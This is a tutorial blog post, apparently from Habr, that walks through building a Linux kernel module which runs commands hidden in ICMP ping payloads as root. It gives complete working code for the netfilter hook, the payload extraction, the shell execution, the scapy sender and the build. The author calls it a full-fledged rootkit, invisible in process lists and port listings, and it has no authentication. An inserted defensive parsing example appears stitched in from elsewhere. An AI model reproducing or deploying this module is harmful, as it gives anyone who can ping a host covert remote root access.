Kernel shell over ICMP


TL;DR: I am writing a kernel module that reads commands from the ICMP payload and executes them on the server even if your SSH has died. For the most impatient, all the code is on GitHub.

Warning! Experienced C programmers may weep tears of blood! I may also be wrong about terminology, but any criticism is welcome. The post is intended for those who have only a very rough idea of C programming and want to look inside Linux.

In the comments to my first article, SoftEther VPN was mentioned, which can mimic some common protocols, in particular HTTPS, ICMP and even DNS. I could only imagine how the first one works, since I am very familiar with HTTP(S), and I had to learn about tunneling over ICMP and DNS.


Yes, in 2020 I learned that you can put an arbitrary payload into ICMP packets. But better late than never! And since something can be done about it, it must be done. Since in everyday life I most often use the command line, including over SSH, the idea of an ICMP shell came to mind first. And to assemble a complete bullshit bingo, I decided to write it as a Linux module in a language I have only a rough idea of. Such a shell will not be visible in the process list, you can load it into the kernel and it will not be on the filesystem, and you will not see anything suspicious in the list of listening ports. In terms of its capabilities this is a full-fledged rootkit, but I hope to refine it and use it as a last-resort shell for when the Load Average is too high to log in over SSH and run at least echo i > /proc/sysrq-trigger to restore access without a reboot.

We take a text editor, basic programming skills in Python and C, Google and a virtual machine you do not mind putting under the knife if everything breaks (optional: VirtualBox / KVM / etc.), and off we go!

Client side

It seemed to me that for the client side I would have to write a script of about 80 lines, but there were kind people who did all the work for me. The code turned out to be unexpectedly simple and fits in 10 significant lines:

#!/usr/bin/env python3
import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    exit(0)

# Send one ICMP echo request whose payload is the command prefixed with "run:",
# then wait for the single echo reply and print it.
p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
    p.show()

The script takes two arguments, an address and a payload. Before sending, the payload is prefixed with the key run:, which we will need to weed out packets carrying random payloads.

The kernel requires privileges to craft packets, so the script has to be run as the superuser. Do not forget to grant execute permissions and to install scapy itself. Debian has a package called python3-scapy. Now you can check how it all works.

Running the script and its output
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!'

This is what it looks like in the sniffer
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct] [Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct] [Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1]
[Response time: 19.094 ms]
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

^C2 packets captured

The payload in the reply packet is unchanged.

Kernel module

To build inside a Debian virtual machine you need at least make and linux-headers-amd64; everything else comes in as dependencies. I will not put the full code in the article, you can clone it from GitHub.

Setting up the hook

First, we need two functions to load the module and unload it. The unload function is not required, but then rmmod will not work:

#include <linux/module.h>
#include <linux/netfilter_ipv4.h>

/* The hook callback is defined further down in the same file. */
static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);

static struct nf_hook_ops nfho;

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;        /* function run for every packet */
  nfho.hooknum = NF_INET_PRE_ROUTING;   /* as soon as the packet enters the kernel */
  nfho.pf = PF_INET;                    /* IPv4 only */
  nfho.priority = NF_IP_PRI_FIRST;      /* ahead of all other hooks */
  /* Propagate the registration result so insmod fails loudly on error. */
  return nf_register_net_hook(&init_net, &nfho);
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

What is happening here:

  1. Two header files are pulled in for manipulating the module itself and netfilter.
  2. All operations go through netfilter, and you can set hooks in it. To do this you need to declare the structure into which the hook will be set. The most important thing is to specify the function that will be executed as the hook: nfho.hook = icmp_cmd_executor; I will get to the function itself later.
    Then I set the moment at which the packet is processed: NF_INET_PRE_ROUTING means processing the packet as soon as it first appears in the kernel. NF_INET_POST_ROUTING can be used to process the packet as it leaves the kernel.
    I set the filter to IPv4: nfho.pf = PF_INET;.
    I give my hook the highest priority: nfho.priority = NF_IP_PRI_FIRST;
    And I register the data structure as a real hook: nf_register_net_hook(&init_net, &nfho);
  3. The last function removes the hook.
  4. The license is stated explicitly so that the compiler does not complain.
  5. The functions module_init() and module_exit() set the other two functions as the ones that initialize and terminate the module.

Extracting the payload

Now we need to extract the payload, which turned out to be the hardest task. The kernel has no built-in functions for working with the payload:

#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/skbuff.h>
#include <linux/string.h>
#include <linux/workqueue.h>

#define MAX_CMD_LEN 1976

/* Shared with work_handler(), because schedule_work() cannot pass an argument. */
char cmd_string[MAX_CMD_LEN];

/* work_handler() is defined further down; declare it so DECLARE_WORK can see it. */
static void work_handler(struct work_struct *work);

/* DECLARE_WORK both defines the struct work_struct my_work and binds it to work_handler. */
DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  /* Only ICMP echo requests are interesting; everything else passes untouched. */
  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

  /* The payload starts right after the ICMP header (size of the struct, not of the pointer). */
  user_data = (unsigned char *)icmph + sizeof(*icmph);
  /* End of the linear data area of the socket buffer. */
  tail = skb_tail_pointer(skb);

  /* Copy the payload, always leaving room for the terminating NUL. */
  j = 0;
  for (i = user_data; i < tail && j < MAX_CMD_LEN - 1; ++i) {
    char c = *(char *)i;

    if (c == '\0')
      break;

    cmd_string[j] = c;
    j++;
  }
  cmd_string[j] = '\0';

  /* Without the run: prefix this is an ordinary ping. */
  if (strncmp(cmd_string, "run:", 4) != 0) {
    return NF_ACCEPT;
  }

  /* Strip the prefix by shifting the string left, terminating NUL included. */
  memmove(cmd_string, cmd_string + 4, strlen(cmd_string + 4) + 1);

  /* Hand the command to the workqueue; the hook itself must return quickly. */
  schedule_work(&my_work);

  return NF_ACCEPT;
}

What is happening:

  1. I had to include additional header files, this time for manipulating the IP and ICMP headers.
  2. I set the maximum string length: #define MAX_CMD_LEN 1976. Why exactly that? Because the compiler complained! I have already been advised that I should understand the stack and the heap; someday I will do that and maybe even fix the code. I immediately set up the string that will hold the command: char cmd_string[MAX_CMD_LEN];. It has to be visible in all functions; I will say more about this in paragraph 9.
  3. Now we need to declare the structure (struct work_struct my_work;) and bind it to another function (DECLARE_WORK(my_work, work_handler);). I will also say why in paragraph nine.
  4. Now I declare the function that will be the hook. Its type and accepted arguments are dictated by netfilter; we are only interested in skb. This is the socket buffer, a fundamental data structure that holds all the available information about a packet.
  5. For the function to work, you need two structures and several variables, including two iterators.
      struct iphdr *iph;
      struct icmphdr *icmph;
    
      unsigned char *user_data;
      unsigned char *tail;
      unsigned char *i;
      int j = 0;
  6. Now we can get to the logic. For the module to work, no packets other than ICMP Echo are needed, so we filter the buffer using built-in functions and throw out all non-ICMP and non-Echo packets. Returning NF_ACCEPT means accepting the packet, but you can also drop packets by returning NF_DROP.
      iph = ip_hdr(skb);
      icmph = icmp_hdr(skb);
    
      if (iph->protocol != IPPROTO_ICMP) {
        return NF_ACCEPT;
      }
      if (icmph->type != ICMP_ECHO) {
        return NF_ACCEPT;
      }

    I did not test what would happen without checking the IP header. My minimal knowledge of C tells me that without extra checks something terrible is bound to happen. I would be glad if you talked me out of this!

  7. Now that the packet is exactly the type you need, you can extract the data. Without a built-in function, you first need to get a pointer to the start of the payload. This is done in one place: you take the pointer to the start of the ICMP header and advance it by the size of that header. Everything uses the icmph structure: user_data = (unsigned char *)icmph + sizeof(*icmph);
    The end of the header must match the end of the payload inside skb, so we get it using a kernel method from the same structure: tail = skb_tail_pointer(skb);.

    The picture was stolen from here; you can read more about the socket buffer there.

  8. Once you have pointers to the start and the end, you can copy the data into the cmd_string string, check for the run: prefix and either ignore the packet if it is missing or rewrite the string, removing this prefix.
  9. That is it, now you can call another handler: schedule_work(&my_work);. Since it is impossible to pass a parameter to such a call, the string holding the command has to be global. schedule_work() puts the function associated with the passed structure into the general queue of the work scheduler and returns, so you do not have to wait for the command to finish. This is necessary because the hook must be very fast. Otherwise, the choice is between nothing starting and getting a kernel panic. Delay is death!
  10. That is it, you can accept the packet with the same return value.
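As an added example (not the article's code), here is the same parsing the hook performs, written as a userspace C function over a constructed packet assembled from the capture above, with the bounds checks the module relies on the caller for: it only ever writes inside the caller's buffer, stops at the packet end, and reports malformed input separately from ordinary pings. The IP checksum in the sample is left as zero and the constant names are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed sample: 20-byte IPv4 header (protocol 1 = ICMP), 8-byte ICMP
 * echo-request header (type 8), then the payload seen in the tshark capture. */
static const uint8_t sample_pkt[] = {
    0x45, 0x00, 0x00, 0x2d, 0x43, 0x42, 0x00, 0x00, 0x3a, 0x01, 0x00, 0x00,
    0xc0, 0xa8, 0x00, 0xf0, 0x2d, 0x0b, 0x1a, 0xe8,             /* IPv4 */
    0x08, 0x00, 0xd6, 0x03, 0x00, 0x00, 0x00, 0x00,             /* ICMP echo */
    'r', 'u', 'n', ':', 'H', 'e', 'l', 'l', 'o', ',', ' ',
    'w', 'o', 'r', 'l', 'd', '!'                                /* payload */
};

/* Returns 1 and fills cmd when pkt is an ICMP echo request carrying a
 * "run:" payload, 0 for any other packet, -1 for a malformed one.
 * Never writes past cmd[cmdlen - 1]; the result is always NUL-terminated. */
int extract_icmp_command(const uint8_t *pkt, size_t len, char *cmd, size_t cmdlen)
{
    size_t ihl, payload_off, n, i;
    const uint8_t *payload;

    if (cmdlen == 0 || len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    ihl = (pkt[0] & 0x0f) * 4;              /* IP header length in bytes */
    if (ihl < 20 || len < ihl + 8)
        return -1;
    if (pkt[9] != 1 || pkt[ihl] != 8)       /* not ICMP, or not an echo request */
        return 0;

    payload_off = ihl + 8;
    payload = pkt + payload_off;
    n = len - payload_off;
    if (n < 4 || memcmp(payload, "run:", 4) != 0)
        return 0;                           /* an ordinary ping */

    /* Copy what follows the prefix, stopping at a NUL, the packet end or the buffer end. */
    payload += 4;
    n -= 4;
    if (n > cmdlen - 1)
        n = cmdlen - 1;
    for (i = 0; i < n && payload[i] != '\0'; i++)
        cmd[i] = (char)payload[i];
    cmd[i] = '\0';
    return 1;
}
```

The same function can be pointed at packets pulled from a pcap to see which echo requests on a host actually carried a command, which is the check a defender wants when reviewing captures like the one above.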

Calling a program in userspace

This function is the most understandable one. Its name was given in DECLARE_WORK(); its type and accepted arguments are not interesting. We take the string with the command and pass it wholesale to the shell. Let it deal with parsing, looking up binaries and everything else.

#include <linux/kmod.h>   /* call_usermodehelper() */

static void work_handler(struct work_struct * work)
{
  /* argv[0] is the program path; the command itself is handed to sh -c in one piece. */
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
  /* Minimal environment: only PATH, so the shell can find binaries. */
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  /* UMH_WAIT_PROC: block this worker until the spawned process exits. */
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

  1. Set the arguments as an array of strings argv[]. I assume everyone knows that programs are executed this way and not as one continuous line with spaces.
  2. Set the environment variables. I included only PATH with a minimal set of directories, hoping that /bin is already merged with /usr/bin and /sbin with /usr/sbin. Other paths rarely matter in practice.
  3. That is it, we run it! The kernel function call_usermodehelper() takes as input: the path to the binary, the array of arguments and the array of environment variables. Here I also assume everyone understands why the path to the executable is passed as a separate argument, but you can ask. The last argument specifies whether to wait for the process to finish (UMH_WAIT_PROC), to wait for the process to start (UMH_WAIT_EXEC) or not to wait at all (UMH_NO_WAIT). There is also UMH_KILLABLE; I did not look into it.

Build

Kernel modules are built through the kernel's own makefile. You call make inside a special directory tied to the kernel version (specified here as KERNELDIR:=/lib/modules/$(shell uname -r)/build), and the location of the module is passed in the M variable in the arguments. The icmpshell.ko and clean targets consist entirely of this call. obj-m names the object file that will be turned into a module. The syntax that turns main.o into icmpshell.o (icmpshell-objs = main.o) does not look very logical to me, but so be it.

KERNELDIR:=/lib/modules/$(shell uname -r)/build

obj-m = icmpshell.o
icmpshell-objs = main.o

all: icmpshell.ko

icmpshell.ko: main.c
	make -C $(KERNELDIR) M=$(PWD) modules

clean:
	make -C $(KERNELDIR) M=$(PWD) clean

We build: make. Load: insmod icmpshell.ko. That is it, you can check: sudo ./send.py 45.11.26.232 "date > /tmp/test". If the file /tmp/test has appeared on your machine and it contains the date at which the request was sent, then you did everything right and so did I.

Conclusion

My first experience of kernel development turned out to be much easier than I expected. Even without any experience developing in C, guided by compiler hints and Google results, I managed to write a working module and feel like a kernel hacker and, at the same time, a script kiddie. On top of that, I went to the Kernel Newbies channel, where they told me to use schedule_work() instead of calling call_usermodehelper() inside the hook itself, and shamed me, rightly suspecting a scam. A hundred lines of code cost me about a week of development in my spare time. A successful experience that destroyed my personal myth about the overwhelming complexity of systems development.

If anyone is willing to do a code review on GitHub, I would be grateful. I am sure I made a lot of silly mistakes, especially when working with strings.


Source: www.habr.com
